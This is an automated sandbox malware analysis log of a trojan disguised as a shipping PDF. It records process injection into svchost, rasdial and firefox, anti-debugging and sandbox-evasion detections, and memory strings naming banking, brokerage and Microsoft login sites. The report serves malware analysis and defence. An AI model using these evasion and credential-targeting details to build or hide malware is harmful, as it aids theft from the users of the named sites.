            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: z4Shipping_document_pdf.exeStatic PE information: real checksum: 0xa2135 should be: 0x156df5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414202 pushfd ; retf 2_2_00414203
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EBB4 push es; iretd 2_2_0041EBB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AC40 push ebx; retf 2_2_0040AC41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D5E3 pushfd ; retf 2_2_0040D5EB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404DEF push ebx; ret 2_2_00404E0C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035A0 push eax; ret 2_2_004035A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004086F9 push 9FEAF530h; iretd 2_2_00408705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx2_2_033309B6
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0398D054 push ADC68628h; iretd 4_2_0398D059
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0398E075 push 9FEAF530h; iretd 4_2_0398E081
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_03992F5F pushfd ; retf 4_2_03992F67
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0398A76B push ebx; ret 4_2_0398A788
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039905BC push ebx; retf 4_2_039905BD
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039A4530 push es; iretd 4_2_039A452C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047709AD push ecx; mov dword ptr [esp], ecx5_2_047709B6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02805156 push 9FEAF530h; iretd 5_2_02805162
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280769D push ebx; retf 5_2_0280769E
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0281B611 push es; iretd 5_2_0281B60D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280184C push ebx; ret 5_2_02801869
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0281E9F0 pushfd ; retn 4003h5_2_0281EA9C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02820960 push es; retf 5_2_02820961
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EF4EC push es; retf 5_2_045EF4F4
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E5589 push ds; iretd 5_2_045E55A3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E67E3 pushad ; ret 5_2_045E67E4
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EF2B7 pushfd ; ret 5_2_045EF2C5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E73F4 push ecx; iretd 5_2_045E73F5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E3E3F pushfd ; retf 5_2_045E3E40
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED2D25 pushad ; retf 7_2_04ED2D8B
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED36BB push ebx; retf 7_2_04ED36BC
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ECD86A push ebx; ret 7_2_04ECD887
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED0242 push ss; retf 7_2_04ED0252
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeAPI/Special instruction interceptor: Address: 412F27C
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD1C0 rdtsc 2_2_033AD1C0
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9839Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.9 %
            Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748Thread sleep count: 133 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748Thread sleep time: -266000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748Thread sleep count: 9839 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748Thread sleep time: -19678000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0281C1E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0281C1E0
            Source: 1FZhY82B.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 1FZhY82B.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 1FZhY82B.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 1FZhY82B.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: rasdial.exe, 00000005.00000002.4553957937.000000000792A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696428655x
            Source: 1FZhY82B.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 1FZhY82B.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 1FZhY82B.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 1FZhY82B.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 1FZhY82B.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 1FZhY82B.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 1FZhY82B.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4550910359.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 1FZhY82B.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 1FZhY82B.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 1FZhY82B.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 1FZhY82B.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: firefox.exe, 00000008.00000002.2820146871.0000017936E9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
            Source: 1FZhY82B.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 1FZhY82B.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 1FZhY82B.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 1FZhY82B.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 1FZhY82B.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 1FZhY82B.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 1FZhY82B.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 1FZhY82B.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 1FZhY82B.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 1FZhY82B.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD1C0 rdtsc 2_2_033AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417683 LdrLoadDll,2_2_00417683
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03405341 mov eax, dword ptr fs:[00000030h]2_2_03405341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03327330 mov eax, dword ptr fs:[00000030h]2_2_03327330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D mov eax, dword ptr fs:[00000030h]2_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D mov eax, dword ptr fs:[00000030h]2_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335F32A mov eax, dword ptr fs:[00000030h]2_2_0335F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]2_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]2_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B930B mov eax, dword ptr fs:[00000030h]2_2_033B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B930B mov eax, dword ptr fs:[00000030h]2_2_033B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B930B mov eax, dword ptr fs:[00000030h]2_2_033B930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]2_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03337370 mov eax, dword ptr fs:[00000030h]2_2_03337370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03337370 mov eax, dword ptr fs:[00000030h]2_2_03337370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03337370 mov eax, dword ptr fs:[00000030h]2_2_03337370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF367 mov eax, dword ptr fs:[00000030h]2_2_033EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329353 mov eax, dword ptr fs:[00000030h]2_2_03329353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329353 mov eax, dword ptr fs:[00000030h]2_2_03329353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]2_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C mov eax, dword ptr fs:[00000030h]2_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C mov eax, dword ptr fs:[00000030h]2_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033533A5 mov eax, dword ptr fs:[00000030h]2_2_033533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033633A0 mov eax, dword ptr fs:[00000030h]2_2_033633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033633A0 mov eax, dword ptr fs:[00000030h]2_2_033633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A mov eax, dword ptr fs:[00000030h]2_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A mov eax, dword ptr fs:[00000030h]2_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034053FC mov eax, dword ptr fs:[00000030h]2_2_034053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]2_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF3E6 mov eax, dword ptr fs:[00000030h]2_2_033EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340539D mov eax, dword ptr fs:[00000030h]2_2_0340539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EB3D0 mov ecx, dword ptr fs:[00000030h]2_2_033EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]2_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]2_2_033B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]2_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03367208 mov eax, dword ptr fs:[00000030h]2_2_03367208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03367208 mov eax, dword ptr fs:[00000030h]2_2_03367208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03359274 mov eax, dword ptr fs:[00000030h]2_2_03359274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03371270 mov eax, dword ptr fs:[00000030h]2_2_03371270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03371270 mov eax, dword ptr fs:[00000030h]2_2_03371270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FD26B mov eax, dword ptr fs:[00000030h]2_2_033FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FD26B mov eax, dword ptr fs:[00000030h]2_2_033FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]2_2_0332826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]2_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03405227 mov eax, dword ptr fs:[00000030h]2_2_03405227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EB256 mov eax, dword ptr fs:[00000030h]2_2_033EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EB256 mov eax, dword ptr fs:[00000030h]2_2_033EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]2_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329240 mov eax, dword ptr fs:[00000030h]2_2_03329240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329240 mov eax, dword ptr fs:[00000030h]2_2_03329240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336724D mov eax, dword ptr fs:[00000030h]2_2_0336724D
